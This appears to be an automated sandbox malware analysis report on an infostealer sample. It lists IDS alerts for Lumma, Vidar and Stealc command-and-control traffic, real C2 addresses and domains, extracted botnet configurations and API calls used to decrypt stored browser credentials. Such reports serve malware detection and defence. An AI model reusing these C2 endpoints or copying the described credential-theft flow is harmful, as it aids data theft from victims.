2024-10-02T09:42:59.069211+0200	2028765	3	Unknown Traffic	192.168.2.4	49853	49.12.197.9	443	TCP
2024-10-02T09:43:00.176123+0200	2028765	3	Unknown Traffic	192.168.2.4	49854	49.12.197.9	443	TCP
2024-10-02T09:43:03.251397+0200	2028765	3	Unknown Traffic	192.168.2.4	49855	49.12.197.9	443	TCP
2024-10-02T09:43:04.272088+0200	2028765	3	Unknown Traffic	192.168.2.4	49856	49.12.197.9	443	TCP
2024-10-02T09:43:08.489928+0200	2028765	3	Unknown Traffic	192.168.2.4	49859	49.12.197.9	443	TCP
2024-10-02T09:43:09.799420+0200	2028765	3	Unknown Traffic	192.168.2.4	49862	49.12.197.9	443	TCP
2024-10-02T09:43:11.144684+0200	2028765	3	Unknown Traffic	192.168.2.4	49864	49.12.197.9	443	TCP
2024-10-02T09:43:12.511919+0200	2028765	3	Unknown Traffic	192.168.2.4	49867	49.12.197.9	443	TCP
2024-10-02T09:43:13.906402+0200	2028765	3	Unknown Traffic	192.168.2.4	49870	49.12.197.9	443	TCP
2024-10-02T09:43:15.357992+0200	2028765	3	Unknown Traffic	192.168.2.4	49873	49.12.197.9	443	TCP
2024-10-02T09:43:16.348799+0200	2028765	3	Unknown Traffic	192.168.2.4	49874	49.12.197.9	443	TCP
2024-10-02T09:43:19.295407+0200	2028765	3	Unknown Traffic	192.168.2.4	49875	49.12.197.9	443	TCP
2024-10-02T09:43:20.571222+0200	2028765	3	Unknown Traffic	192.168.2.4	49876	49.12.197.9	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:34.671175+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49760	172.67.208.141	443	TCP
2024-10-02T09:41:35.665991+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49762	188.114.96.3	443	TCP
2024-10-02T09:41:36.738752+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49765	104.21.56.150	443	TCP
2024-10-02T09:41:37.666044+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49767	104.21.84.18	443	TCP
2024-10-02T09:41:38.617530+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49769	104.21.18.193	443	TCP
2024-10-02T09:41:39.614449+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49772	172.67.195.67	443	TCP
2024-10-02T09:41:40.735439+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49774	104.21.17.174	443	TCP
2024-10-02T09:41:42.874868+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49777	104.21.16.12	443	TCP
2024-10-02T09:42:17.992636+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49802	172.67.208.141	443	TCP
2024-10-02T09:42:19.183858+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49804	188.114.96.3	443	TCP
2024-10-02T09:42:20.305595+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49806	104.21.56.150	443	TCP
2024-10-02T09:42:21.728661+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49807	104.21.84.18	443	TCP
2024-10-02T09:42:22.805678+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49810	104.21.18.193	443	TCP
2024-10-02T09:42:23.805540+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49812	172.67.195.67	443	TCP
2024-10-02T09:42:25.110723+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49813	104.21.17.174	443	TCP
2024-10-02T09:42:27.371909+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49817	104.21.16.12	443	TCP
2024-10-02T09:42:38.298990+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49827	172.67.208.141	443	TCP
2024-10-02T09:42:39.253738+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49829	188.114.96.3	443	TCP
2024-10-02T09:42:40.348664+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49831	104.21.56.150	443	TCP
2024-10-02T09:42:42.467917+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49832	104.21.84.18	443	TCP
2024-10-02T09:42:43.811989+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49834	104.21.18.193	443	TCP
2024-10-02T09:42:44.890071+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49836	172.67.195.67	443	TCP
2024-10-02T09:42:46.061303+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49838	104.21.17.174	443	TCP
2024-10-02T09:42:48.995520+0200	2054653	1	A Network Trojan was detected	192.168.2.4	49841	104.21.16.12	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:34.671175+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49760	172.67.208.141	443	TCP
2024-10-02T09:41:35.665991+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49762	188.114.96.3	443	TCP
2024-10-02T09:41:36.738752+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49765	104.21.56.150	443	TCP
2024-10-02T09:41:37.666044+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49767	104.21.84.18	443	TCP
2024-10-02T09:41:38.617530+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49769	104.21.18.193	443	TCP
2024-10-02T09:41:39.614449+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49772	172.67.195.67	443	TCP
2024-10-02T09:41:40.735439+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49774	104.21.17.174	443	TCP
2024-10-02T09:41:42.874868+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49777	104.21.16.12	443	TCP
2024-10-02T09:42:17.992636+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49802	172.67.208.141	443	TCP
2024-10-02T09:42:19.183858+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49804	188.114.96.3	443	TCP
2024-10-02T09:42:20.305595+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49806	104.21.56.150	443	TCP
2024-10-02T09:42:21.728661+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49807	104.21.84.18	443	TCP
2024-10-02T09:42:22.805678+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49810	104.21.18.193	443	TCP
2024-10-02T09:42:23.805540+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49812	172.67.195.67	443	TCP
2024-10-02T09:42:25.110723+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49813	104.21.17.174	443	TCP
2024-10-02T09:42:27.371909+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49817	104.21.16.12	443	TCP
2024-10-02T09:42:38.298990+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49827	172.67.208.141	443	TCP
2024-10-02T09:42:39.253738+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49829	188.114.96.3	443	TCP
2024-10-02T09:42:40.348664+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49831	104.21.56.150	443	TCP
2024-10-02T09:42:42.467917+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49832	104.21.84.18	443	TCP
2024-10-02T09:42:43.811989+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49834	104.21.18.193	443	TCP
2024-10-02T09:42:44.890071+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49836	172.67.195.67	443	TCP
2024-10-02T09:42:46.061303+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49838	104.21.17.174	443	TCP
2024-10-02T09:42:48.995520+0200	2049836	1	A Network Trojan was detected	192.168.2.4	49841	104.21.16.12	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:42:23.651100+0200	2054495	1	A Network Trojan was detected	192.168.2.4	49811	45.132.206.251	80	TCP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:20.647305+0200	2044245	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.4	49749	TCP
2024-10-02T09:42:22.634887+0200	2044245	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.4	49809	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:20.637585+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:42:22.597711+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49809	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:20.821331+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:42:22.813485+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49809	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:21.245684+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:42:23.376496+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49809	46.8.231.109	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:20.829184+0200	2044247	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.4	49749	TCP
2024-10-02T09:41:39.460433+0200	2044247	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49771	TCP
2024-10-02T09:42:22.862005+0200	2044247	1	Malware Command and Control Activity Detected	46.8.231.109	80	192.168.2.4	49809	TCP
2024-10-02T09:42:31.539678+0200	2044247	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49822	TCP
2024-10-02T09:42:56.807905+0200	2044247	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49849	TCP
2024-10-02T09:43:13.223182+0200	2044247	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49867	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:40.953212+0200	2051831	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49773	TCP
2024-10-02T09:42:33.001551+0200	2051831	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49823	TCP
2024-10-02T09:42:58.323797+0200	2051831	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49852	TCP
2024-10-02T09:43:14.606293+0200	2051831	1	Malware Command and Control Activity Detected	49.12.197.9	443	192.168.2.4	49870	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:39.460254+0200	2049087	1	A Network Trojan was detected	192.168.2.4	49771	49.12.197.9	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:20.409769+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:42:22.371927+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49809	46.8.231.109	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:02.359210+0200	2803305	3	Unknown Traffic	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:41:36.859290+0200	2803305	3	Unknown Traffic	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:41:37.859275+0200	2803305	3	Unknown Traffic	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:42:09.828134+0200	2803305	3	Unknown Traffic	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:42:11.046865+0200	2803305	3	Unknown Traffic	192.168.2.4	49731	172.67.74.152	80	TCP
2024-10-02T09:42:45.812527+0200	2803305	3	Unknown Traffic	192.168.2.4	49835	172.67.74.152	80	TCP
2024-10-02T09:42:56.703206+0200	2803305	3	Unknown Traffic	192.168.2.4	49850	172.67.74.152	80	TCP
2024-10-02T09:43:10.744177+0200	2803305	3	Unknown Traffic	192.168.2.4	49863	104.26.13.205	80	TCP
2024-10-02T09:43:14.751863+0200	2803305	3	Unknown Traffic	192.168.2.4	49871	104.26.13.205	80	TCP
2024-10-02T09:43:27.239810+0200	2803305	3	Unknown Traffic	192.168.2.4	49880	104.26.13.205	80	TCP
2024-10-02T09:43:35.932660+0200	2803305	3	Unknown Traffic	192.168.2.4	49885	104.26.13.205	80	TCP
2024-10-02T09:44:10.664548+0200	2803305	3	Unknown Traffic	192.168.2.4	49890	104.26.13.205	80	TCP
2024-10-02T09:44:25.690313+0200	2803305	3	Unknown Traffic	192.168.2.4	49895	104.26.13.205	80	TCP
2024-10-02T09:44:46.953419+0200	2803305	3	Unknown Traffic	192.168.2.4	49900	104.26.13.205	80	TCP
2024-10-02T09:45:04.016147+0200	2803305	3	Unknown Traffic	192.168.2.4	49905	104.26.13.205	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:21.431763+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:24.521795+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:25.361105+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:25.956114+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:26.461890+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:28.066658+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:28.463039+0200	2803304	3	Unknown Traffic	192.168.2.4	49749	46.8.231.109	80	TCP
2024-10-02T09:41:31.744757+0200	2803304	3	Unknown Traffic	192.168.2.4	49758	147.45.44.104	80	TCP
2024-10-02T09:42:23.557167+0200	2803304	3	Unknown Traffic	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:26.403985+0200	2803304	3	Unknown Traffic	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:27.190574+0200	2803304	3	Unknown Traffic	192.168.2.4	49809	46.8.231.109	80	TCP
2024-10-02T09:42:27.813890+0200	2803304	3	Unknown Traffic	192.168.2.4	49819	46.8.231.109	80	TCP
2024-10-02T09:42:29.059752+0200	2803304	3	Unknown Traffic	192.168.2.4	49819	46.8.231.109	80	TCP
2024-10-02T09:42:29.711278+0200	2803304	3	Unknown Traffic	192.168.2.4	49821	46.8.231.109	80	TCP
2024-10-02T09:42:30.387628+0200	2803304	3	Unknown Traffic	192.168.2.4	49821	46.8.231.109	80	TCP
2024-10-02T09:42:33.240246+0200	2803304	3	Unknown Traffic	192.168.2.4	49824	147.45.44.104	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T09:41:16.056110+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49743	147.45.44.104	80	TCP
2024-10-02T09:41:16.056346+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49744	147.45.44.104	80	TCP
2024-10-02T09:42:13.120133+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49799	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "8b4d47586874b08947203f03e4db3962"}
Source: 11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.raw.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}
Source: 32.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["treatynreit.site", "mysterisop.site", "absorptioniw.site", "chorusarorp.site", "snarlypagowo.site", "abnomalrkmu.site", "questionsmw.stor", "soldiefieop.site"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for domain / URL

Source: gravvitywio.store

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\CBFIIEHJDB.exe	ReversingLabs: Detection: 60%
Source: C:\ProgramData\GHDHDBAECG.exe	ReversingLabs: Detection: 60%
Source: C:\ProgramData\KEHDBAEGII.exe	ReversingLabs: Detection: 55%
Source: C:\Users\userBAKKEGCAAE.exe	ReversingLabs: Detection: 60%
Source: C:\Users\userCAAKKFHCFI.exe	ReversingLabs: Detection: 60%
Source: C:\Users\userDHDAFBFCFH.exe	ReversingLabs: Detection: 60%
Source: C:\Users\userEHJDHJKFIE.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66fbfcc301a31_swws[1].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66fbfccd837ac_vadggdsa[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66fbfcc9963ca_ldfsna[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66fbfcc9963ca_ldfsna[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 21%
Source: file.exe	Virustotal: Detection: 35%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: absorptioniw.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: mysterisop.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: snarlypagowo.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: treatynreit.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: chorusarorp.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: abnomalrkmu.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: soldiefieop.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: questionsmw.stor
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: chorusarorp.site
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 32.2.RegAsm.exe.400000.0.unpack	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0051C020 SetLastError,GetModuleHandleA,CryptGenRandom,	5_2_0051C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0051BD80 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,	5_2_0051BD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0051BF40 CryptReleaseContext,	5_2_0051BF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	15_2_00409B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	15_2_0040C820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	15_2_00407240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	15_2_00409AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	15_2_00418EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B436C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	15_2_6B436C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_6B58A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	15_2_6B58A9A0

Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.195.67:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.163:443 -> 192.168.2.4:49908 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 0000000F.00000002.2358493205.000000006B49D000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: LKMService.exe, 00000006.00000002.2006855231.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
